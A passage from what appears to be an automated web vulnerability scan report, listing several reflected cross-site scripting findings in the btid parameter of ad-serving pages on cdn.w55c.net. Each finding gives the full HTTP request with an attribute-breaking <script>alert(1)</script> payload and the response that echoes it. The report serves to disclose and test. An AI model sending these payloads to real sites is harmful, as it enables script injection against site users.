<iframe id='a3cde47f' name='a3cde47f' src='http://d.w55c.net/afr.php?zoneid=790&amp;cb=92db2'><script>alert(1)</script>2ac55c6fad6' frameborder='0' scrolling='no' width='160' height='600'><a href='htt
...[SNIP]...

6.71. http://cdn.w55c.net/i/0RW21p2fqU_270915107.html [btid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.w55c.net
Path:   /i/0RW21p2fqU_270915107.html

Issue detail

The value of the btid request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload a5166'><script>alert(1)</script>d02c00949bc was submitted in the btid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /i/0RW21p2fqU_270915107.html?rtbhost=rts-rr17.sldc.dataxu.net&btid=a5166'><script>alert(1)</script>d02c00949bc&ei=GOOGLE_CONTENTNETWORK&wp_exchange=TbRQNgAFoToK7FcQpbsDBuQ7j9zay5ySEgzsXw&euid=Q0FFU0VPOGx5aWVNVWhXMXZzQlNlZE1IdGRn&slotid=MQ&fiu=MEZjSUxxQkZUbw&ciu=MFJXMjFwMmZxVQ&reqid=NERCNDUwMzYwMDA1QTEzQTBBRUM1NzEwQTVCQjAzMDY&ccw=SUFCMSMwLjB8SUFCOCMwLjB8SUFCMTQjMC4wOTA5NjI0OXxJQUIyMiMwLjMwMTAwNjA4&bp=252&zc=NzUyMDc&v=2&s=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php& HTTP/1.1
Host: cdn.w55c.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&lmt=1303680649&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php%3Fsearch%3D%7B%24keywa6d4b&dt=1303662649299&bpp=2&shv=r20110420&jsv=r20110415&correlator=1303662649303&frm=1&adk=2614322350&ga_vid=278906705.1303662649&ga_sid=1303662649&ga_hid=1493962260&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=980&bih=907&ifk=2540724997&eid=36815001&fu=4&ifi=1&dtd=6
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: matchadmeld=1; matchpubmatic=1; matchbluekai=1; matchgoogle=1; wfivefivec=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC

Response

HTTP/1.1 200 OK
Set-Cookie: wfivefivec=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC;Path=/;Domain=.w55c.net;Expires=Tue, 23-Apr-13 16:31:12 GMT
P3p: policyref='http://w55c.net/w3c/p3p.xml', CP='DSP NOI COR'
Accept-Ranges: bytes
Last-Modified: Wed, 20 Apr 2011 21:25:08 GMT
Date: Sun, 24 Apr 2011 16:00:15 GMT
Server: w55c.net
Via: 1.1 ics_server.xpc-mii.net (XLR 2.3.0.2.23a), HTTP/1.0 cdn.w55c.net (MII JProxy)
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Via: 1.1 ics_server.xpc-mii.net (XLR 2.3.0.2.23a)
Connection: keep-alive
Content-Length: 453

<iframe id='adcfce52' name='adcfce52' src='http://d.w55c.net/afr.php?zoneid=750&amp;cb=a5166'><script>alert(1)</script>d02c00949bc' frameborder='0' scrolling='no' width='160' height='600'><a href='htt
...[SNIP]...

6.72. http://cdn.w55c.net/i/0RW21p2fqU_270915107.html [btid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.w55c.net
Path:   /i/0RW21p2fqU_270915107.html

Issue detail

The value of the btid request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 6d816'><script>alert(1)</script>08da9559568 was submitted in the btid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /i/0RW21p2fqU_270915107.html?rtbhost=rts-rr17.sldc.dataxu.net&btid=NERCNDUwMzYwMDA1QTEzQTBBRUM1NzEwQTVCQjAzMDZ8R0ZFcnBoektNWXwxMzAzNjYyNjQ4NDE3fDF8MEZjSUxxQkZUb3wwUlcyMXAyZnFVfDlRUXhjVE81dUgySWE3Qms0dkdTMlM5NnVmT0dzU0RDfDI1MjE4NQ6d816'><script>alert(1)</script>08da9559568&ei=GOOGLE_CONTENTNETWORK&wp_exchange=TbRQNgAFoToK7FcQpbsDBuQ7j9zay5ySEgzsXw&euid=Q0FFU0VPOGx5aWVNVWhXMXZzQlNlZE1IdGRn&slotid=MQ&fiu=MEZjSUxxQkZUbw&ciu=MFJXMjFwMmZxVQ&reqid=NERCNDUwMzYwMDA1QTEzQTBBRUM1NzEwQTVCQjAzMDY&ccw=SUFCMSMwLjB8SUFCOCMwLjB8SUFCMTQjMC4wOTA5NjI0OXxJQUIyMiMwLjMwMTAwNjA4&bp=252&zc=NzUyMDc&v=2&s=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php& HTTP/1.1
Host: cdn.w55c.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&lmt=1303680649&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php%3Fsearch%3D%7B%24keywa6d4b&dt=1303662649299&bpp=2&shv=r20110420&jsv=r20110415&correlator=1303662649303&frm=1&adk=2614322350&ga_vid=278906705.1303662649&ga_sid=1303662649&ga_hid=1493962260&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=980&bih=907&ifk=2540724997&eid=36815001&fu=4&ifi=1&dtd=6
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: matchadmeld=1; matchpubmatic=1; matchbluekai=1; matchgoogle=1; wfivefivec=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC

Response

HTTP/1.1 200 OK
Set-Cookie: wfivefivec=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC;Path=/;Domain=.w55c.net;Expires=Tue, 23-Apr-13 16:31:12 GMT
P3p: policyref='http://w55c.net/w3c/p3p.xml', CP='DSP NOI COR'
Accept-Ranges: bytes
Last-Modified: Wed, 20 Apr 2011 21:25:08 GMT
Date: Sun, 24 Apr 2011 16:00:15 GMT
Server: w55c.net
Via: 1.1 ics_server.xpc-mii.net (XLR 2.3.0.2.23a), HTTP/1.0 cdn.w55c.net (MII JProxy)
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Via: 1.1 ics_server.xpc-mii.net (XLR 2.3.0.2.23a)
Connection: keep-alive
Content-Length: 939

<iframe id='adcfce52' name='adcfce52' src='http://d.w55c.net/afr.php?zoneid=750&amp;cb=NERCNDUwMzYwMDA1QTEzQTBBRUM1NzEwQTVCQjAzMDZ8R0ZFcnBoektNWXwxMzAzNjYyNjQ4NDE3fDF8MEZjSUxxQkZUb3wwUlcyMXAyZnFVfDlRU
...[SNIP]...
://d.w55c.net/ck.php?n=a8501ffc&amp;cb=NERCNDUwMzYwMDA1QTEzQTBBRUM1NzEwQTVCQjAzMDZ8R0ZFcnBoektNWXwxMzAzNjYyNjQ4NDE3fDF8MEZjSUxxQkZUb3wwUlcyMXAyZnFVfDlRUXhjVE81dUgySWE3Qms0dkdTMlM5NnVmT0dzU0RDfDI1MjE4NQ6d816'><script>alert(1)</script>08da9559568' target='_blank'>
...[SNIP]...

6.73. http://cdn.w55c.net/i/0RZieDDeGI_308736425.html [btid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.w55c.net
Path:   /i/0RZieDDeGI_308736425.html

Issue detail

The value of the btid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 141f8"><script>alert(1)</script>c27f9fba2f5 was submitted in the btid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /i/0RZieDDeGI_308736425.html?rtbhost=rts-rr14.sldc.dataxu.net&btid=141f8"><script>alert(1)</script>c27f9fba2f5&ei=GOOGLE_CONTENTNETWORK&wp_exchange=TbRQjAANb_wK7GYTuv9w7qr-ELGqjb86HRtR-A&euid=Q0FFU0VPOGx5aWVNVWhXMXZzQlNlZE1IdGRn&slotid=MQ&fiu=MEZZWG9GdFhPUQ&ciu=MFJaaWVERGVHSQ&reqid=NERCNDUwOEMwMDBENkZGQzBBRUM2NjEzQkFGRjcwRUU&ccw=SUFCMSMwLjB8SUFCOCMwLjB8SUFCMTQjMC4wOTA5NjI0OXxJQUIyMiMwLjMwMTAwNjA4&bp=205&zc=NzUyMDc&v=2&s=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php& HTTP/1.1
Host: cdn.w55c.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&lmt=1303680735&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php%3Fsearch%3D%7B%24keywa6d4b&dt=1303662735800&bpp=3&shv=r20110420&jsv=r20110415&correlator=1303662735812&frm=1&adk=2614322350&ga_vid=273036336.1303662736&ga_sid=1303662736&ga_hid=1991820173&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=980&bih=907&ifk=2540724997&fu=4&ifi=1&dtd=14
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: matchadmeld=1; matchpubmatic=1; matchbluekai=1; matchgoogle=1; wfivefivec=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC

Response

HTTP/1.1 200 OK
Set-Cookie: wfivefivec=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC;Path=/;Domain=.w55c.net;Expires=Tue, 23-Apr-13 16:32:23 GMT
Cache-Control: no-cache, no-store
Pragma: no-cache
P3p: policyref='http://w55c.net/w3c/p3p.xml', CP='DSP NOI COR'
Date: Sun, 24 Apr 2011 16:30:15 GMT
Accept-Ranges: bytes
Last-Modified: Tue, 29 Mar 2011 15:51:31 GMT
Server: w55c.net
Via: 1.1 ics_server.xpc-mii.net (XLR 2.3.0.2.23a), HTTP/1.0 cdn.w55c.net (MII JProxy)
Content-Type: text/html
Via: 1.1 ics_server.xpc-mii.net (XLR 2.3.0.2.23a)
Connection: keep-alive
Content-Length: 3077

<IFRAME SRC="http://ad.doubleclick.net/adi/N5762.158901.DATAXU/B4799014.12;sz=160x600;ord=141f8"><script>alert(1)</script>c27f9fba2f5?" WIDTH=160 HEIGHT=600 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR='#000000'>
...[SNIP]...

6.74. http://cdn.w55c.net/i/0RZieDDeGI_308736425.html [btid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.w55c.net
Path:   /i/0RZieDDeGI_308736425.html

Issue detail

The value of the btid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ec549"><script>alert(1)</script>f44e9649168 was submitted in the btid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /i/0RZieDDeGI_308736425.html?rtbhost=rts-rr14.sldc.dataxu.net&btid=NERCNDUwOEMwMDBENkZGQzBBRUM2NjEzQkFGRjcwRUV8R0ZIMlV3cUxBSnwxMzAzNjYyNzM0OTIyfDF8MEZZWG9GdFhPUXwwUlppZUREZUdJfDlRUXhjVE81dUgySWE3Qms0dkdTMlM5NnVmT0dzU0RDfDIwNTc3MQec549"><script>alert(1)</script>f44e9649168&ei=GOOGLE_CONTENTNETWORK&wp_exchange=TbRQjAANb_wK7GYTuv9w7qr-ELGqjb86HRtR-A&euid=Q0FFU0VPOGx5aWVNVWhXMXZzQlNlZE1IdGRn&slotid=MQ&fiu=MEZZWG9GdFhPUQ&ciu=MFJaaWVERGVHSQ&reqid=NERCNDUwOEMwMDBENkZGQzBBRUM2NjEzQkFGRjcwRUU&ccw=SUFCMSMwLjB8SUFCOCMwLjB8SUFCMTQjMC4wOTA5NjI0OXxJQUIyMiMwLjMwMTAwNjA4&bp=205&zc=NzUyMDc&v=2&s=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php& HTTP/1.1
Host: cdn.w55c.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&lmt=1303680735&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php%3Fsearch%3D%7B%24keywa6d4b&dt=1303662735800&bpp=3&shv=r20110420&jsv=r20110415&correlator=1303662735812&frm=1&adk=2614322350&ga_vid=273036336.1303662736&ga_sid=1303662736&ga_hid=1991820173&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=980&bih=907&ifk=2540724997&fu=4&ifi=1&dtd=14
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: matchadmeld=1; matchpubmatic=1; matchbluekai=1; matchgoogle=1; wfivefivec=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC

Response

HTTP/1.1 200 OK
Set-Cookie: wfivefivec=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC;Path=/;Domain=.w55c.net;Expires=Tue, 23-Apr-13 16:32:23 GMT
Cache-Control: no-cache, no-store
P3p: policyref='http://w55c.net/w3c/p3p.xml', CP='DSP NOI COR'
Date: Sun, 24 Apr 2011 16:30:15 GMT
Pragma: no-cache
Accept-Ranges: bytes
Last-Modified: Tue, 29 Mar 2011 15:51:31 GMT
Server: w55c.net
Via: 1.1 ics_server.xpc-mii.net (XLR 2.3.0.2.23a), HTTP/1.0 cdn.w55c.net (MII JProxy)
Content-Type: text/html
Via: 1.1 ics_server.xpc-mii.net (XLR 2.3.0.2.23a)
Connection: keep-alive
Content-Length: 3725

<IFRAME SRC="http://ad.doubleclick.net/adi/N5762.158901.DATAXU/B4799014.12;sz=160x600;ord=NERCNDUwOEMwMDBENkZGQzBBRUM2NjEzQkFGRjcwRUV8R0ZIMlV3cUxBSnwxMzAzNjYyNzM0OTIyfDF8MEZZWG9GdFhPUXwwUlppZUREZUdJfD
...[SNIP]...
AXU/B4799014.12;abr=!ie;sz=160x600;ord=NERCNDUwOEMwMDBENkZGQzBBRUM2NjEzQkFGRjcwRUV8R0ZIMlV3cUxBSnwxMzAzNjYyNzM0OTIyfDF8MEZZWG9GdFhPUXwwUlppZUREZUdJfDlRUXhjVE81dUgySWE3Qms0dkdTMlM5NnVmT0dzU0RDfDIwNTc3MQec549"><script>alert(1)</script>f44e9649168?">
...[SNIP]...

6.75. http://cdn.w55c.net/i/0RaZHwYk2m_562981296.html [btid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.w55c.net
Path:   /i/0RaZHwYk2m_562981296.html

Issue detail

The value of the btid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fe60a"><script>alert(1)</script>b9ba2a08030 was submitted in the btid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /i/0RaZHwYk2m_562981296.html?rtbhost=rts-rr15.sldc.dataxu.net&btid=fe60a"><script>alert(1)</script>b9ba2a08030&ei=GOOGLE_CONTENTNETWORK&wp_exchange=TbRAkQAN6vYK5X_NOLUzcqM_ssWL-1bQiOIurQ&euid=Q0FFU0VPOGx5aWVNVWhXMXZzQlNlZE1IdGRn&slotid=MQ&fiu=MEZKak0yUU5jSw&ciu=MFJhWkh3WWsybQ&reqid=NERCNDQwOTEwMDBERUFGNjBBRTU3RkNEMzhCNTMzNzI&ccw=SUFCMSMwLjB8SUFCOCMwLjB8SUFCMTQjMC4wOTA5NjI0OXxJQUIyMiMwLjMwMTAwNjA4&bp=467&zc=NzUyMDc&v=0&s=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_728_90_b.php& HTTP/1.1
Host: cdn.w55c.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-6888065668292638&output=html&h=90&slotname=9524956792&w=728&lmt=1303676644&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_728_90_b.php%3Fsearch%3D%7B%24keyword%7D&dt=1303658644881&bpp=3&shv=r20110420&jsv=r20110415&correlator=1303658644887&frm=1&adk=513358139&ga_vid=1984226007.1303658645&ga_sid=1303658645&ga_hid=40124116&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=3961147505&fu=4&ifi=1&dtd=9
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: matchadmeld=1; matchpubmatic=1; matchbluekai=1; matchgoogle=1; wfivefivec=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC

Response

HTTP/1.1 200 OK
Set-Cookie: wfivefivec=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC;Path=/;Domain=.w55c.net;Expires=Tue, 23-Apr-13 15:30:51 GMT
Cache-Control: no-cache, no-store
Pragma: no-cache
P3p: policyref='http://w55c.net/w3c/p3p.xml', CP='DSP NOI COR'
Date: Sun, 24 Apr 2011 15:24:15 GMT
Accept-Ranges: bytes
Last-Modified: Thu, 21 Apr 2011 23:51:09 GMT
Server: w55c.net
Via: 1.1 ics_server.xpc-mii.net (XLR 2.3.0.2.23a), HTTP/1.0 cdn.w55c.net (MII JProxy)
Content-Type: text/html
Via: 1.1 ics_server.xpc-mii.net (XLR 2.3.0.2.23a)
Connection: keep-alive
Content-Length: 874

<IFRAME SRC="http://ad.doubleclick.net/adi/N3016.158901.DATAXU/B5398270.22;sz=728x90;pc=[TPAS_ID];ord=fe60a"><script>alert(1)</script>b9ba2a08030?" WIDTH=728 HEIGHT=90 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR='#000000'>
...[SNIP]...

6.76. http://cdn.w55c.net/i/0RaZHwYk2m_562981296.html [btid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.w55c.net
Path:   /i/0RaZHwYk2m_562981296.html

Issue detail

The value of the btid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b0f46"><script>alert(1)</script>0888b4f4843 was submitted in the btid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /i/0RaZHwYk2m_562981296.html?rtbhost=rts-rr15.sldc.dataxu.net&btid=NERCNDQwOTEwMDBERUFGNjBBRTU3RkNEMzhCNTMzNzJ8R0ZHWXhySXJOM3wxMzAzNjU4NjQ1MjkyfDF8MEZKak0yUU5jS3wwUmFaSHdZazJtfEVYXzEwMjM0NzcyMDZ8NDY3MTU4b0f46"><script>alert(1)</script>0888b4f4843&ei=GOOGLE_CONTENTNETWORK&wp_exchange=TbRAkQAN6vYK5X_NOLUzcqM_ssWL-1bQiOIurQ&euid=Q0FFU0VPOGx5aWVNVWhXMXZzQlNlZE1IdGRn&slotid=MQ&fiu=MEZKak0yUU5jSw&ciu=MFJhWkh3WWsybQ&reqid=NERCNDQwOTEwMDBERUFGNjBBRTU3RkNEMzhCNTMzNzI&ccw=SUFCMSMwLjB8SUFCOCMwLjB8SUFCMTQjMC4wOTA5NjI0OXxJQUIyMiMwLjMwMTAwNjA4&bp=467&zc=NzUyMDc&v=0&s=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_728_90_b.php& HTTP/1.1
Host: cdn.w55c.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-6888065668292638&output=html&h=90&slotname=9524956792&w=728&lmt=1303676644&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_728_90_b.php%3Fsearch%3D%7B%24keyword%7D&dt=1303658644881&bpp=3&shv=r20110420&jsv=r20110415&correlator=1303658644887&frm=1&adk=513358139&ga_vid=1984226007.1303658645&ga_sid=1303658645&ga_hid=40124116&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=3961147505&fu=4&ifi=1&dtd=9
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: matchadmeld=1; matchpubmatic=1; matchbluekai=1; matchgoogle=1; wfivefivec=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC

Response

HTTP/1.1 200 OK
Set-Cookie: wfivefivec=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC;Path=/;Domain=.w55c.net;Expires=Tue, 23-Apr-13 15:30:48 GMT
Cache-Control: no-cache, no-store
Pragma: no-cache
P3p: policyref='http://w55c.net/w3c/p3p.xml', CP='DSP NOI COR'
Accept-Ranges: bytes
Last-Modified: Thu, 21 Apr 2011 23:51:09 GMT
Date: Sun, 24 Apr 2011 15:02:54 GMT
Server: w55c.net
Via: 1.1 ics_server.xpc-mii.net (XLR 2.3.0.2.23a), HTTP/1.0 cdn.w55c.net (MII JProxy)
Content-Type: text/html
Via: 1.1 ics_server.xpc-mii.net (XLR 2.3.0.2.23a)
Connection: keep-alive
Content-Length: 1418

<IFRAME SRC="http://ad.doubleclick.net/adi/N3016.158901.DATAXU/B5398270.22;sz=728x90;pc=[TPAS_ID];ord=NERCNDQwOTEwMDBERUFGNjBBRTU3RkNEMzhCNTMzNzJ8R0ZHWXhySXJOM3wxMzAzNjU4NjQ1MjkyfDF8MEZKak0yUU5jS3wwUm
...[SNIP]...
016.158901.DATAXU/B5398270.22;abr=!ie;sz=728x90;pc=[TPAS_ID];ord=NERCNDQwOTEwMDBERUFGNjBBRTU3RkNEMzhCNTMzNzJ8R0ZHWXhySXJOM3wxMzAzNjU4NjQ1MjkyfDF8MEZKak0yUU5jS3wwUmFaSHdZazJtfEVYXzEwMjM0NzcyMDZ8NDY3MTU4b0f46"><script>alert(1)</script>0888b4f4843?">
...[SNIP]...

6.77. http://cdn.w55c.net/i/0RilLTaqf1_958911823.html [btid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.w55c.net
Path:   /i/0RilLTaqf1_958911823.html

Issue detail

The value of the btid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 935a4"><script>alert(1)</script>6cd3e634953 was submitted in the btid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /i/0RilLTaqf1_958911823.html?rtbhost=rts-rr13.sldc.dataxu.net&btid=NERCNDU0RjYwMDBBNzE5NzBBRUM2NThCQ0E4MTRBNUF8R0ZVeWQxclZsYXwxMzAzNjYzODY0NzY1fDF8MEZTb3MxV1lvZXwwUmlsTFRhcWYxfDlRUXhjVE81dUgySWE3Qms0dkdTMlM5NnVmT0dzU0RDfDYxMTg4MQ935a4"><script>alert(1)</script>6cd3e634953&ei=GOOGLE_CONTENTNETWORK&wp_exchange=TbRU9gAKcZcK7GWLyoFKWsZOaIGHRR4fdymMmw&euid=Q0FFU0VPOGx5aWVNVWhXMXZzQlNlZE1IdGRn&slotid=MQ&fiu=MEZTb3MxV1lvZQ&ciu=MFJpbExUYXFmMQ&reqid=NERCNDU0RjYwMDBBNzE5NzBBRUM2NThCQ0E4MTRBNUE&ccw=SUFCMSMwLjB8SUFCOCMwLjB8SUFCMTQjMC4wOTA5NjI0OXxJQUIyMiMwLjMwMTAwNjA4&bp=611&zc=NzUyMDc&v=2&s=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php& HTTP/1.1
Host: cdn.w55c.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&lmt=1303681865&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php%3Fsearch%3D%7B%24keywa6d4b&dt=1303663865478&bpp=16&shv=r20110420&jsv=r20110415&correlator=1303663865496&frm=1&adk=2614322350&ga_vid=1538346491.1303663866&ga_sid=1303663866&ga_hid=2007194349&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=980&bih=907&ifk=2540724997&eid=33895132&fu=4&ifi=1&dtd=121
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: matchadmeld=1; matchpubmatic=1; matchbluekai=1; matchgoogle=1; wfivefivec=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC

Response

HTTP/1.1 200 OK
Set-Cookie: wfivefivec=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC;Path=/;Domain=.w55c.net;Expires=Tue, 23-Apr-13 16:56:30 GMT
Cache-Control: no-cache, no-store
P3p: policyref='http://w55c.net/w3c/p3p.xml', CP='DSP NOI COR'
Date: Sun, 24 Apr 2011 16:50:11 GMT
Accept-Ranges: bytes
Last-Modified: Wed, 06 Apr 2011 17:50:22 GMT
Server: w55c.net
Via: 1.1 ics_server.xpc-mii.net (XLR 2.3.0.2.23a), HTTP/1.0 cdn.w55c.net (MII JProxy)
Pragma: no-cache
Content-Type: text/html
Via: 1.1 ics_server.xpc-mii.net (XLR 2.3.0.2.23a)
Connection: keep-alive
Content-Length: 1552

<IFRAME SRC="http://ad.doubleclick.net/adi/N4637.158901.6939390485621/B5385253.8;sz=160x600;pc=[TPAS_ID];ord=NERCNDU0RjYwMDBBNzE5NzBBRUM2NThCQ0E4MTRBNUF8R0ZVeWQxclZsYXwxMzAzNjYzODY0NzY1fDF8MEZTb3MxV1l
...[SNIP]...
.8;abr=!ie;sz=160x600;pc=[TPAS_ID];ord=NERCNDU0RjYwMDBBNzE5NzBBRUM2NThCQ0E4MTRBNUF8R0ZVeWQxclZsYXwxMzAzNjYzODY0NzY1fDF8MEZTb3MxV1lvZXwwUmlsTFRhcWYxfDlRUXhjVE81dUgySWE3Qms0dkdTMlM5NnVmT0dzU0RDfDYxMTg4MQ935a4"><script>alert(1)</script>6cd3e634953?">
...[SNIP]...

